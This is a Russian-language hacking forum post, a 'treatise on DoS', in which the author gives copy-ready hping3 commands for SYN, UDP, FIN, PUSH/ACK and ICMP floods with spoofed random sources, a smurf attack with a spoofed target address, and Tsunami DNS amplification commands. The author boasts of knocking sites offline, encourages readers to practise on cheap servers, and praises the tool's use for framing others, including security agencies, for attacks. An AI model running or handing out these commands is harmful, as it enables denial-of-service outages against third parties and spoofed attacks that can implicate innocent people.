трактат о DoS-e | dos - flood attack

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Всем привет, решил я поделится с Вами этими методиками и инструментами ибо, зае..ли эти китайские услуги, СОДА ,Малышева, глисты для похудения и всякого рода ..уета)) Те люди у которых не установлен (или лень его натянуть на браузер)

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, они меня поймут и часто еще обращаются с просьбами положить сайты с педофилией(в луковице как правило) что я с успехом и делаю, где и Вам рекомендую оттачивать это "не легкое" ремесло..))

И так что же что такое DOS атака подробно Вы узнаете

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

от меня в двух словах DOS - это когда она ведется от одной машины то есть один на один DDOS - это когда от 2-ух и более типо >BotNet Дедок, привет!))

И так начнем с классики с утилиты которая меня в свое время очень поразила своим функционалом (не скажу каким) смысл этой атаки есть таков, что можно подставить любого человека или сами знаете какую силовую организацию в том что он(они) нападали на другую более серьезную организацию)) в общем веселая программа

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

которая с успехом проводит

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

на TCP -протокол соединения, а он как Вы знаете<-(наверное) обладает трехсторонним рукопожатием.

Код:
hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Код:
hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP

Ну и старички помнят легенду, которая также проводит такие же атаки : TCP, UDP, HTTP.

42fa38eb4db3557c16971.png


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



TCP_FIN-флуд это если атакующий только атакует сервер без TCP-соединения, пакет FIN будет отброшен, но сервер все равно будет выделять некоторые ресурсы для просмотра пакета, чтобы предотвратить избыточность и в скором времени он ляжет

Код:
hping3 --flood --rand-source -F -p TARGET_PORT TARGET_IP

PUSH _ACK-флуд это если сервер раздразнить этим флудом, он может обидеться и ваще перестать всех обслуживать)


Код:
hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP

ICMP_IGMP-флуд это мало эффективная атака нужно проводить долго и не одному но все же укажу её, так это же трактат)


Код:
hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP

SMURF-флуд это Злоумышленник выберет некоторые промежуточные сайты в качестве усилителей, а затем отправит огромное количество запросов ICMP (ping) на эти промежуточные сайты для широковещательного IP-адреса. Таким образом, все исходные IP-адреса изменяются на целевые IP-адреса, которые передают эти пакеты хостам всех подсетей. Наконец, все ответы хоста отправляются обратно в цель.

Код:
hping3 --icmp --spoof TARGET_IP BROADCAST_IP

С это утилитой пожалуй все, но представлю Вам еще один инструмент:
Tsunami - DNS Amplification Attack Tool - Он предназначен для исследования и тестирования ваших брандмауэров, а также IDS / IPS. Не думайте об использовании этого инструмента для атаки. Это очень дорого из-за низкой производительности. Эффект может отличаться в зависимости от ширины полосы, количества сеансов и размера обратной связи от запроса домена, а также от мощности инструмента. <<<-- это перевод от

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, но поверьте эта прожка достойна внимания!))
Код:
./tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8
./tsunami -s TARGET_IP -n pentest.blog -p 3 -f recursive_dns.txt


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

на

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, как

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

без

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

меня!?

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

! И дополню что

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

полно в дистрибутиве

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

46 как видите.) на любой вкус и цвет.
edf161feb7f58e3fa8571.png


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Напутствие: "Применяйте такого рода атаки в благородных целях!" так как нормальный сервак Вам одному положить не удастся, а вот какой нить слабенький за пару долларов в месяц или вообще free, легко на которых как правило размещен всякого рода трэш и отчаянные попытки нажиться на простых людях.. в общем Вы меня надеюсь услышали!) Удачи!
 

Название темы